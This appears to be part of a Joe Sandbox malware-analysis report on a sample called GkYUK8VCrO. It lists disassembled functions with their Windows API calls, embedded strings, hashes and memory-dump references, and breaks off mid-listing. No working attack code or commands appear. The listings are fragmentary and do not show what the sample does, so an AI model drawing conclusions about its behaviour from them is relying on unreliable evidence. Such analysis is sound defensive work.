API String ID: 3744389584-679674701
Opcode ID: 5e9efb86099a7caa98339e89dd269c8aa4e2eff27bc86a73d5135bd8d60142cc
Instruction ID: abfa65c202a6382f188402125fecc495e0392a1819e0dbcc33f4c351e1350c84
Opcode Fuzzy Hash: 5e9efb86099a7caa98339e89dd269c8aa4e2eff27bc86a73d5135bd8d60142cc
Instruction Fuzzy Hash: 95A1B1B120420AAFD715DFA4C884BFAB7E8FF14355F008529FA9DD2150DB30E945CB92

Function 00AFB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00AFB3DB
_wcscmp.LIBCMT ref: 00AFB3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00AFB414
CharUpperBuffW.USER32(?,00000000), ref: 00AFB431
_wcscmp.LIBCMT ref: 00AFB44F
_wcsstr.LIBCMT ref: 00AFB460
GetClassNameW.USER32(00000018,?,00000400), ref: 00AFB498
_wcscmp.LIBCMT ref: 00AFB4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00AFB4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 00AFB518
_wcscmp.LIBCMT ref: 00AFB528
GetClassNameW.USER32(00000010,?,00000400), ref: 00AFB550
GetWindowRect.USER32(00000004,?), ref: 00AFB5B9

Strings

ThumbnailClass, xrefs: 00AFB4A3, 00AFB523
@, xrefs: 00AFB3BC

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 6e52d773cb330fd5ef2692e40279600dec2cab949df1808c7cf4a68a12cfa5ce
Instruction ID: 15dc6019e6621c5f8dd1677d3f623906af98192a4bf9b615c992459af13cc176
Opcode Fuzzy Hash: 6e52d773cb330fd5ef2692e40279600dec2cab949df1808c7cf4a68a12cfa5ce
Instruction Fuzzy Hash: 9481AE7101820A9BDB15DF90C985FBABBF8EF44314F088569FE859A0A2DB34DD45CBA1

Function 00AFB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00AFB23F

Strings

[REGEXPTITLE:, xrefs: 00AFB267
LAST, xrefs: 00AFB204
ACTIVE, xrefs: 00AFB21A
[HANDLE:, xrefs: 00AFB24B
[ACTIVE, xrefs: 00AFB22C
[ALL, xrefs: 00AFB2E5
CLASSNAME=, xrefs: 00AFB27C
[CLASS:, xrefs: 00AFB28F
HANDLE=, xrefs: 00AFB238
ALL, xrefs: 00AFB2D3
[LAST, xrefs: 00AFB2EC
REGEXP=, xrefs: 00AFB254

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 04500752a16081e9b86bab5296e659ce9f9861eed485a7acb270528035f6e187
Instruction ID: 06468db54d85d2648c7fb47ae03946cde550bb2cb6e2166f1c4111c02142c952
Opcode Fuzzy Hash: 04500752a16081e9b86bab5296e659ce9f9861eed485a7acb270528035f6e187
Instruction Fuzzy Hash: 3231A331A54209E6DF14FBA0CE43FFEB7B49F15751F600199B911724E1EF616E08C9A1

Function 00AFC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00AFC4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AFC4E6
SetWindowTextW.USER32(?,?), ref: 00AFC4FD
GetDlgItem.USER32(?,000003EA), ref: 00AFC512
SetWindowTextW.USER32(00000000,?), ref: 00AFC518
GetDlgItem.USER32(?,000003E9), ref: 00AFC528
SetWindowTextW.USER32(00000000,?), ref: 00AFC52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AFC54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AFC569
GetWindowRect.USER32(?,?), ref: 00AFC572
SetWindowTextW.USER32(?,?), ref: 00AFC5DD
GetDesktopWindow.USER32 ref: 00AFC5E3
GetWindowRect.USER32(00000000), ref: 00AFC5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00AFC636
GetClientRect.USER32(?,?), ref: 00AFC643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00AFC668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AFC693

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 6a1c2267b1f9ababc507fcb553c88cacbf990568caa6578c4d3e6af093c17b62
Instruction ID: 34c836a27fc5bf9e388e26546f7a1de27af838c8e79ffff870a76d042279f401
Opcode Fuzzy Hash: 6a1c2267b1f9ababc507fcb553c88cacbf990568caa6578c4d3e6af093c17b62
Instruction Fuzzy Hash: 4F515F7190070DAFDB219FA9DE89B7EBBB5FF04715F004928F686A35A0CB74A905CB50

Function 00B2A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B2A4C8
DestroyWindow.USER32(?,?), ref: 00B2A542

Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B2A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B2A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2A5F1
DestroyWindow.USER32(00000000), ref: 00B2A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B2A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2A663
GetDesktopWindow.USER32 ref: 00B2A67C
GetWindowRect.USER32(00000000), ref: 00B2A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B2A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B2A6B3

Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC

Strings

0, xrefs: 00B2A4DE
tooltips_class32, xrefs: 00B2A5B5, 00B2A643

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 574e6e64728455229f9d1613d162273317ef8c437b1a99797c6d2dfb0431afa4
Instruction ID: e60221d0cbf338cba8a0c3915d302f57668cf9f20c664017fc69f910b0cbba07
Opcode Fuzzy Hash: 574e6e64728455229f9d1613d162273317ef8c437b1a99797c6d2dfb0431afa4
Instruction Fuzzy Hash: 2C719C71140205AFD721CF28DC45F6A7BF6FB88700F08496DF989972A0CB75E946CB52

Function 00B2C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DragQueryPoint.SHELL32(?,?), ref: 00B2C917

Part of subcall function 00B2ADF1: ClientToScreen.USER32(?,?), ref: 00B2AE1A
Part of subcall function 00B2ADF1: GetWindowRect.USER32(?,?), ref: 00B2AE90
Part of subcall function 00B2ADF1: PtInRect.USER32(?,?,00B2C304), ref: 00B2AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 00B2C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B2C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B2C9AE
_wcscat.LIBCMT ref: 00B2C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B2C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 00B2CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 00B2CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 00B2CA47
DragFinish.SHELL32(?), ref: 00B2CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B2CB41

Strings

@GUI_DRAGFILE, xrefs: 00B2CAF0
@GUI_DRAGID, xrefs: 00B2CAB9
@GUI_DROPID, xrefs: 00B2CA6E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: d46c86c2e79ceb5c052360d2191e512974fdf5bd24071a4c23a281885df25a4b
Instruction ID: a80cf67b5de74f1d425387c6d58f6476a086a90272ecb61298cfd50ddc966f4f
Opcode Fuzzy Hash: d46c86c2e79ceb5c052360d2191e512974fdf5bd24071a4c23a281885df25a4b
Instruction Fuzzy Hash: A3615771108301AFC711EF64DD85DAFBBE8EF89710F000A6EF595931A1DB709A49CB62

Function 00B24619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B246AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B246F6

Strings

GETTOTALCOUNT, xrefs: 00B246DD
ISCHECKED, xrefs: 00B24879
SELECT, xrefs: 00B248A7
CHECK, xrefs: 00B24716
UNCHECK, xrefs: 00B248D2
COLLAPSE, xrefs: 00B2473C
GETITEMCOUNT, xrefs: 00B247D8
GETTEXT, xrefs: 00B24849
EXPAND, xrefs: 00B247A8
EXISTS, xrefs: 00B2475F
GETSELECTED, xrefs: 00B24806

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: fa874c73226c3cebb606a1689c219b646a3a52f054cd257b174774b83011826b
Instruction ID: 893e979ca5d62ea0a9fac33982a59253f50b33904966b9901147025193a520ed
Opcode Fuzzy Hash: fa874c73226c3cebb606a1689c219b646a3a52f054cd257b174774b83011826b
Instruction Fuzzy Hash: 70917C342047119FCB14EF20D591E6AB7E1EF99354F0448ACF89A5B7A2DB31ED4ACB81

Function 00B2BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B2BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00B26D80,?), ref: 00B2BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B2BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B2BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B2BC7D
FreeLibrary.KERNEL32(?), ref: 00B2BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B2BC99
DestroyIcon.USER32(?), ref: 00B2BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B2BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B2BCD1

Part of subcall function 00AC313D: __wcsicmp_l.LIBCMT ref: 00AC31C6

Strings

.dll, xrefs: 00B2BB27
.exe, xrefs: 00B2BB04
.icl, xrefs: 00B2BAE4

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: b32de3fe713d228e40614b35b391efdcc46e03c13e284ab28467f0cf08a731ea
Instruction ID: 02342878c11d0314ba4b274d5977550d4290d3aa357612dbf09a8990b307c698
Opcode Fuzzy Hash: b32de3fe713d228e40614b35b391efdcc46e03c13e284ab28467f0cf08a731ea
Instruction Fuzzy Hash: 9261D071900629BEEB24DF64DD85FBA77B8EB08710F104269F919D61D0DF749980CBA0

Function 00B0A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

CharLowerBuffW.USER32(?,?), ref: 00B0A636
GetDriveTypeW.KERNEL32 ref: 00B0A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A730

Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66

Strings

type cdaudio alias cd wait, xrefs: 00B0A6AE
closed, xrefs: 00B0A64A, 00B0A653
open , xrefs: 00B0A692
open, xrefs: 00B0A65D
wait, xrefs: 00B0A6ED
set cd door , xrefs: 00B0A6D1
close, xrefs: 00B0A63C
close cd wait, xrefs: 00B0A71B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 88cd4acfa97083244f8f6fbbbf961a47d39849f0f668520b4f924b19cf50efba
Instruction ID: 834d5171d4395d4d7f03a0722cbbb0f5ed70498c77795c8f663952d45146fd80
Opcode Fuzzy Hash: 88cd4acfa97083244f8f6fbbbf961a47d39849f0f668520b4f924b19cf50efba
Instruction Fuzzy Hash: FB512B711043059FC700EF20C99196BB7F4FF99758F1489ADF896572A1DB31AE0ACB52

Function 00B0A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B0A47A
__swprintf.LIBCMT ref: 00B0A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B0A4FE
_memset.LIBCMT ref: 00B0A51D
_wcsncpy.LIBCMT ref: 00B0A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B0A58E
CloseHandle.KERNEL32(00000000), ref: 00B0A599
RemoveDirectoryW.KERNEL32(?), ref: 00B0A5A2
CloseHandle.KERNEL32(00000000), ref: 00B0A5AC

Strings

:, xrefs: 00B0A4BD
\??\%s, xrefs: 00B0A496
\, xrefs: 00B0A4B2

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: f79af0a477b7a99b62fe4e29c06b5a697f0f73e2b78a3f49fcaaab3aa6b48898
Instruction ID: cf23698d6cdc3a73e6fb050217dbd728b1925893b793706aa031074f145fbb70
Opcode Fuzzy Hash: f79af0a477b7a99b62fe4e29c06b5a697f0f73e2b78a3f49fcaaab3aa6b48898
Instruction Fuzzy Hash: 8B316EB650021AABDB21DFA0DC49FFB77BCEF89701F1041B6F909D61A0EB7096458B25

Function 00ADAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 00ADAB7B
___wtomb_environ.LIBCMT ref: 00ADAB9D

Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68

__malloc_crt.LIBCMT ref: 00ADABC5
__malloc_crt.LIBCMT ref: 00ADABE2
_free.LIBCMT ref: 00ADAC19
__recalloc_crt.LIBCMT ref: 00ADAC52
__recalloc_crt.LIBCMT ref: 00ADAC97
_strlen.LIBCMT ref: 00ADACC3
__calloc_crt.LIBCMT ref: 00ADACCD
_strlen.LIBCMT ref: 00ADACDC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00ADAD0A
_free.LIBCMT ref: 00ADAD24
_free.LIBCMT ref: 00ADAD31
_free.LIBCMT ref: 00ADAD43
__invoke_watson.LIBCMT ref: 00ADAD5D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: fdb832adbd37fcd160d78635f332e63f8a6e47c6983251b1ad2777eaf7ce4a48
Instruction ID: e011a99311498cb01b1f7a05da444ee7290453e4cd4eed93879e10911fd64a9c
Opcode Fuzzy Hash: fdb832adbd37fcd160d78635f332e63f8a6e47c6983251b1ad2777eaf7ce4a48
Instruction Fuzzy Hash: 18613472900205AFDB205F64D906B697BA5FF22731F15411BE813AB3D0DBB9CD81CB92

Function 00B2C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B2C4EC
GetFocus.USER32 ref: 00B2C4FC
GetDlgCtrlID.USER32(00000000), ref: 00B2C507
_memset.LIBCMT ref: 00B2C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B2C65D
GetMenuItemCount.USER32(?), ref: 00B2C67D
GetMenuItemID.USER32(?,00000000), ref: 00B2C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B2C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B2C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B2C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B2C779

Strings

0, xrefs: 00B2C62A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: bd577ced1024ed107c7b2107829fbcba784a0ef0925e5715402df062b7beec9a
Instruction ID: 02e113f2dab4bcbbb53b2010c92f51eda53a1d1206c3577e865fa9cd8d4cffe6
Opcode Fuzzy Hash: bd577ced1024ed107c7b2107829fbcba784a0ef0925e5715402df062b7beec9a
Instruction Fuzzy Hash: 49817D702083219FD721CF24E984A6FBBE8FB98354F10496DF999932A1DB71DD05CB92

Function 00AF83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8766
Part of subcall function 00AF874A: GetLastError.KERNEL32(?,00AF822A,?,?,?), ref: 00AF8770
Part of subcall function 00AF874A: GetProcessHeap.KERNEL32(00000008,?,?,00AF822A,?,?,?), ref: 00AF877F
Part of subcall function 00AF874A: HeapAlloc.KERNEL32(00000000,?,00AF822A,?,?,?), ref: 00AF8786
Part of subcall function 00AF874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF879D

Part of subcall function 00AF87E7: GetProcessHeap.KERNEL32(00000008,00AF8240,00000000,00000000,?,00AF8240,?), ref: 00AF87F3
